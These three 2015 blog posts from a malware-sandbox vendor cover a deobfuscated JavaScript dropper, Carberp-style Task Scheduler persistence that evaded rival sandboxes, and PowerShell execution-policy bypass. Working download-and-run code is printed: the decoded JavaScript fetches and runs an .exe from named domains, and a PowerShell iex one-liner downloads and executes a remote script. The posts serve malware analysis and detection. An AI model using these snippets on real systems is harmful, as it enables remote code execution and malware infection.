Tuesday, September 29, 2015

Sandboxes are not dead: automatically decoding a heavily obfuscated javascript

That's right. Sandbox technology is not dead, but some implementations can turn out to be if they are not maintained to adapt to the ever-changing threat landscape. In this blogpost we will take a look at a heavily obfuscated javascript and present some output of VxStream Sandbox's new decoder engine (just as Google, we consider any aspect of our product to be beta).

While malicious javascript is usually just the first step of an attack and often acts as a dropper, it can make sense to read the underlying source-code and understand how the algorithm of generating the point of contacts, in order to create better static signatures or more predictable firewall rules. While this is not a primary 'Sandbox' issue in general (as sandbox technology focuses mostly around runtime behavior, it is for the specific case of VxStream Sandbox, which tries to implement and combine static and dynamic analysis technologies.

Understanding the Obfuscation

Let's take a look at the basic Javascript and its structure.

// the ID of this campaign
var str="5550535E080510A4A070B4A0D085E17011614565E55505057575152575555";


// declare some string concatenating functions in random order
function ulln() { byfmst += 'r dn'; }; function xvtm() { byfmst += 'if ('; }; function bngfzt() { byfmst += 'mira'; }; function ydxxy() { byfmst += 'i-f'; }; function jjtwpgj() { byfmst += 'ew A'; }; function rfvfwwa() { byfmst += 'ring'; }; function uqvvt() { byfmst += '.cl'; }; function lkqok() { byfmst += '00'; }; function rmpmy() { byfmst += '}; i'; }; function oljwc() { byfmst += '== '; }; function agxgrsy() { byfmst += 'am'; }; function zvlw() { ygwoys += 'val'; }; function geypt() { byfmst += 'ode'; }; function ckqdv() { byfmst += 'ia.co'; }; function ydfkjy() { byfmst += 'f ('; }; function wyzo() { byfmst += 'id='; }; 


// put together all the strings
ulln(); jfqzddc(); srgjly(); xdvhde(); fafqmrk(); xcltdch(); kvbykg(); cxoi(); umlo(); jikrct(); myzkelk();

// finally trigger the payload using the re-built strings


As we can see from reading the above code (the comments were not part of the script, of course): it's quite obfuscated and not very understandable, nor is there some easy way to recreate the source-code or intention. Basically, what the malicious javascript* is doing to hide the "eval(payload)" operation (which is a very typical scheme by the way and prone to eval->print replacement attacks) is to split the underlying strings into a number of string concatenation operations nested in function calls. The nested aspect makes it quite diffcult for pure static deobfuscation to recreate the original string, because the function order declaration is randomized as well (i.e. a linear scan will not work).

* the full sample download and SHA256 is available on the report linked at the very bottom

Decoding the obfuscated Javascript

So what did we do to beat the obfuscated Javascript? Well, without going in too many details, we basically parsed the Javascript and emulated its execution, recreating the obfuscated strings allowing us to understand what is happening. This is how the "decoded and deobfuscated" javascript looks:

function dl(fr) {
    var b = "i-fizz.com siliconmedia.com samiragallery.com".split(" ");
    for (var i = 0; i < b.length; i++) {
        var ws = new ActiveXObject("WScript.Shell");
        var fn = ws.ExpandEnvironmentStrings("%TEMP%") + String.fromCharCode(92) + Math.round(Math.random() * 100000000) + ".exe";
        var dn = 0;
        var xo = new ActiveXObject("MSXML2.XMLHTTP");
        xo.onreadystatechange = function() {
            if (xo.readyState == 4 && xo.status == 200) {
                var xa = new ActiveXObject("ADODB.Stream");
                xa.type = 1;
                if (xa.size > 5000) {
                    dn = 1;
                    xa.position = 0;
                    xa.saveToFile(fn, 2);
                    try {
                        ws.Run(fn, 1, 0);
                    } catch (er) {};
        try {
            xo.open("GET", "http://" + b[i] + "/document.php?rnd=" + fr + "&id=" + str, false);
        } catch (er) {};
        if (dn == 1) break;

Looks better now? :-) Well, inspecting the code it becomes quite evident what is happening. The only interesting aspect seems to be the requirement for the response body (xa.size > 5000) and the 'id' and 'rnd' parameters passed as part of the 'document.php' GET request. It seems like random seeds and a campaign identifier.

Putting it all together in the report

So where do you find all this wonderful data in the report? Well, we created a few behavior signatures that make it a little easier for you to track down some of the deobfuscated strings. Also, keep in mind that any "string" extracted from any aspect of VxStream Sandbox is piped back to the string behavior signature interface, so you will see some regex matches on the URLs/domains. Following are some screenshots that highlight interesting parts of the report. It should be noted that the Javascript executed as expected: the extracted domains were contacted (see network traffic section) and files were dropped, most of them with VirusTotal rates at 1/56 or even marked as clean.

Report Link: https://www.reverse.it/sample/4a549052e2ab20d1b05e7c3bf54330a7058294f6bce919c3a6cedc9362e40324?environmentId=1



Sandbox systems can be quite sexy, if the underlying technology is sound and the codebase is updated on a regular basis. For us, the bottom line is that "automated malware analysis" is a cat & mouse game - something that every honest IT security vendor will admit. Analyzing programs automatically is simply very difficult and every day criminal gangs (and other parties) think of new tricks to bypass existing systems. That is one of the reasons why the webservice at http://www.reverse.it is public. The diversity is a perfect stress test and gives us the ability to constantly improve the system looking at failing samples, but it's a full time job.

Thursday, September 24, 2015

Evading APT industry leaders using the Task Scheduler

We often get asked how VxStream Sandbox compares to proclaimed malware analysis industry leaders and other competitors. One aspect when comparing e.g. a hardware appliance with VxStream Sandbox is that our system is very configurable and a wide open "virtual appliance" (it is possible to deploy and scale application servers as a VM with embedded analysis VMs). What that means is that a lot of aspects are open and understandable. You can add/edit your own behavior signatures, import your own ISO files (e.g. "golden image"), control what happens during the analysis and so on. that can be configured to run files on any environment. On the other hand, pre-configured and so called "hardened" appliances (marketing term for "black box with voodoo magic") are predictable and easier to detect and evade. The previous points are architectural aspects, but what about the actual engine, the malware analysis and forensics side? We were interested to see how well the "big players" actually match up to some common techniques and decided to make a spot check. We will not disclose what vendor or product we compared against, but it was indeed one of those industry leaders, but more to that later.


The "spot check"

For this blogpost we decided to take a look at a persistence method, because successful persistence of any piece of malware is always quite critical. For a malware analysis system, the very least should be detecting the capability, but in the best case successfully trigger and reveal the methodology involved. To make our small experiment as realistic as possible, we decided not to write our own sample code, but use an exact copy of something you would find in the wild. Preferrably, we would like to use source code from an existing botnet/exploit kit or trojan. Luckily, the source code of Carberp - a botnet creation kit - was leaked back in mid 2013 (by the way: it made over $250,000,000 in damages). Seems like a perfect match to build a poc sample and test it against our own and competitor's system(s).

In the specific case of Carberp, there is an additional explosiveness: one must assume that components of the leaked code will be copycatted into other "projects" of this kind. Thus, one would assume special diligence in respect to detecting crucial parts, e.g. a persistence method that survives a reboot, would be put forward by the industry leaders. As an example, this industry leader spends a whopping $68M in Research and Development.

Back to the technical part: the specific persistence method we were looking at utilizes the Task Scheduler 2.0 interface (Vista and above) and the implementing code from Carberp can be found on github at schtasks.cpp and is publicly available to anyone:

What is the Task Scheduler? To quote Microsoft:
"The Task Scheduler enables you to automatically perform routine tasks on a chosen computer. The Task Scheduler does this by monitoring whatever criteria you choose to initiate the tasks (referred to as triggers) and then executing the tasks when the criteria is met."
More precisely, the Task Scheduler 1.0 was shipped starting with Windows 2000, XP and Server 2003. It is quite old and not that interesting for our test case, because with v1.0 the process adding a task does so in a quite visible and easy-to-detect way for Sandbox systems that monitor specific processes. To be concrete: a *.job file (basically, an XML file that references conditions and actions) is created with the help of mstask.dll. The new Task Scheduler 2.0 interface (which was introduced with Windows Vista) is far more interesting though: it utilizes the taskschd.dll (Task Scheduler COM API) to invoke creation of the task through the Task Scheduler service (svchost.exe). When a sandbox system relies on observing actions of single processes only, it will have issues detecting the exact file creation and/or registry events, because the svchost.exe instance is not part of the process tree and subsequently not included in runtime logging. As VxStream Sandbox observes the entire file system state, it would detect tasks being scheduled, as a file system change happens.

So anyway, we quickly whipped up a proof of concept executable that creates a task to execute C:/malware.exe when a LOGON event is triggered. Should we succeed in setting this task on a Windows machine, we would expect all alarm signals of the analysis system to go off. Well, from all the systems we were able to test the our sample was classified as "benign" and had no malicious alerts of any relevance. Side note: want to try on your own appliance/sandbox? At the end of the blogpost we have a link to the VxStream Sandbox report which contains a download link to the sample we used.

So how did VxStream Sandbox perform? Please do take a look yourself (yes, we did optimize a bit before making this blogpost):

SHA256: fd6a9541b1826f5242395f789d341b1478e66e93a7c388d07f51146163494455



Some may call this blogpost nitpicking, because security always contains multiple layers and a sandbox is not a silver bullet. True, but if you charge premium price, have a big mouth regarding your own technology - then you should at least get your homework done and detect when a scheduled task is registered that runs an arbitrary executable on every reboot.
Something else we noticed: lately there has been a variety of blogposts around malware utilizing the COM interface in order to evade analysis and it seems like an uprising trend, because - as briefly mentioned - the malicious activity is happening at a remote process.

Monday, September 14, 2015

Using powershell as an infection vector

It's been a bit quiet on our blog over the past weeks while we have been busy implementing new features and analyzing samples we come accross on our public webservice (which has a new domain called reverse.it, by the way).

Bypassing Powershell's Execution Policy

About two weeks ago we came accross an interesting sample that was uploaded on our public webservice (and as the 'Do not share' button was not checked, also shared with VirusTotal)*. It uses powershell.exe to bypass the execution policy (see the -ep bypass part of the commandline) and it also uses the -Enc parameter to Base64 encode the expression that is invoked. To be precise, it is trying to download a script from an URL and executing it with a 'Invoke Expression' (iex) call. Here is the syntax:

$w=new-object net.webclient;$w.UseDefaultCredentials=$true;$w.Proxy.Credentials=$w.Credentials;iex($w.downloadstring('<URL>'))

See also the following screenshot from our report, which quite nicely detects this code snippit:

While these kind of bypassing tricks don't seem to be considerably new (see this excellent blogpost), it was the first time we saw it on our webservice and thought it would be a good idea to put some attention to these kind of tricks. You may have noticed in the screenshot above, while the Base64 artifact detection is not yet perfect, we do extract the most signifcant portion as part of the commandline and feedback the result into the signature interface. This ends up triggering all kind of other signatures, e.g. the URL regex pattern signature:

If you would like to see more details (and a download link to the sample), here are two reports on 32-bit and 64-bit environments:



The fact that malware is "outsourcing" and utilizing Windows components is a general trend I think we are seeing (e.g. the latest rise in COM interface utilization). So staying up-to-date with state of the art methods is a vital process and a mandatory requisite for any IT-Security product. If you have any interesting sample that you think could do better, please do send us a quick note to support@payload-security.com.

* if you upload any file to our webservice, even if you do check the 'Do not share' checkbox, a public report will be generated nevertheless (just with the download link disabled and no VT upload, if unknown). Also, please note that when a sample has been uploaded to VT (and is thereby part of the public domain), we will not delete your report if the upload was unintentional and it contains relevant information for the IT-Sec industry.